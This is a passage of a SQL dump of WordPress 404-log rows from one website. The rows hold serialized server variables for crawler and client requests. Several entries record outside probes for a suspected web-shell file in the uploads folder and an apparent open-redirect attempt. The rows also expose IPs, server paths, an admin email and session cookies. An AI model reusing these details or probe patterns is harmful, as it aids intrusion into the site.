I\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571632202.0649\";s:12:\"REQUEST_TIME\";s:10:\"1571632202\";}}','notice','2019-10-21 04:30:06','2019-10-21 04:30:02',35312104,37121024,'https://bintara.com.my/?page_id=18',1,0,'166.62.85.224'),(28564,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2372.400 QQBrowser/9.5.11096.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"196.245.255.108\";s:11:\"REMOTE_PORT\";s:5:\"42463\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa02mok4CZZwMupfWgjCIQAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571632794.8171\";s:12:\"REQUEST_TIME\";s:10:\"1571632794\";}}','notice','2019-10-21 04:39:56','2019-10-21 04:39:55',34923872,36733720,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'196.245.255.108'),(28565,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8F1C8F02-5418-47DC-B66F-6BD36DF8D7C6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa04KcUiXNL058AVCLtttgAAAc8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.133.51.106\";s:11:\"REMOTE_PORT\";s:5:\"55774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa04KcUiXNL058AVCLtttgAAAc8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571633194.0411\";s:12:\"REQUEST_TIME\";s:10:\"1571633194\";}}','notice','2019-10-21 04:46:35','2019-10-21 04:46:34',35275536,37077088,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.133.51.106'),(28566,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-t1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0@Zok4CZZwMupfWgjI6gAAABg\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-t1/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.74\";s:11:\"REMOTE_PORT\";s:4:\"1897\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0@Zok4CZZwMupfWgjI6gAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571634790.6918\";s:12:\"REQUEST_TIME\";s:10:\"1571634790\";}}','notice','2019-10-21 05:13:13','2019-10-21 05:13:11',34196408,35998912,'https://bintara.com.my/toughbook-t1/',1,0,'40.77.167.74'),(28567,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-US\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:352:\"PHPSESSID=qi45h9llqua1b72fgheugc91j6; wp_woocommerce_session_98154e5ffae2b44b325706407b2cee5a=c498137703098a7ef9007af117f34035%7C%7C1516120254%7C%7C1516116654%7C%7C3fd4d782be99c33bd6dd2faec1695df1; yith_ywraq_session_98154e5ffae2b44b325706407b2cee5a=1f9fa245c01d6d5e03f099c61591c8a6%7C%7C1516120254%7C%7C1516116654%7C%7C43276eabce22a957e3a5e6707c783940\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"http://bintara.com.my/category/one-page/\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa1H98UiXNL058AVCLtxKgAAAdM\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa1H98UiXNL058AVCLtxKgAAAdM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"55301\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa1H98UiXNL058AVCLtxKgAAAdM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571637239.9832\";s:12:\"REQUEST_TIME\";s:10:\"1571637239\";}}','notice','2019-10-21 05:54:02','2019-10-21 05:54:00',33809688,34166712,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'66.249.71.30'),(28568,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa1IUsUiXNL058AVCLtxRgAAAcI\";s:19:\"REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:19:\"REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa1IUsUiXNL058AVCLtxRgAAAcI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.191.197\";s:11:\"REMOTE_PORT\";s:5:\"33818\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:10:\"SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa1IUsUiXNL058AVCLtxRgAAAcI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571637330.9583\";s:12:\"REQUEST_TIME\";s:10:\"1571637330\";}}','notice','2019-10-21 05:55:33','2019-10-21 05:55:31',34970888,36770984,'https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected',1,0,'47.91.191.197'),(28569,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa1IVIk4CZZwMupfWgjRAAAAABA\";s:19:\"REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:19:\"REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa1IVIk4CZZwMupfWgjRAAAAABA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.191.197\";s:11:\"REMOTE_PORT\";s:5:\"33987\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:10:\"SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa1IVIk4CZZwMupfWgjRAAAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571637332.7242\";s:12:\"REQUEST_TIME\";s:10:\"1571637332\";}}','notice','2019-10-21 05:55:35','2019-10-21 05:55:33',34970888,36770984,'https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected',1,0,'47.91.191.197'),(28570,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa1IcIk4CZZwMupfWgjRGwAAAA0\";s:19:\"REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:19:\"REDIRECT_SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa1IcIk4CZZwMupfWgjRGwAAAA0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.191.197\";s:11:\"REMOTE_PORT\";s:5:\"34473\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:76:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected\";s:10:\"SCRIPT_URL\";s:54:\"/wp-content/uploads/2018/12/content-post.php.suspected\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa1IcIk4CZZwMupfWgjRGwAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571637361.0063\";s:12:\"REQUEST_TIME\";s:10:\"1571637361\";}}','notice','2019-10-21 05:56:03','2019-10-21 05:56:01',34969952,36777144,'https://bintara.com.my/wp-content/uploads/2018/12/content-post.php.suspected',1,0,'47.91.191.197'),(28571,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 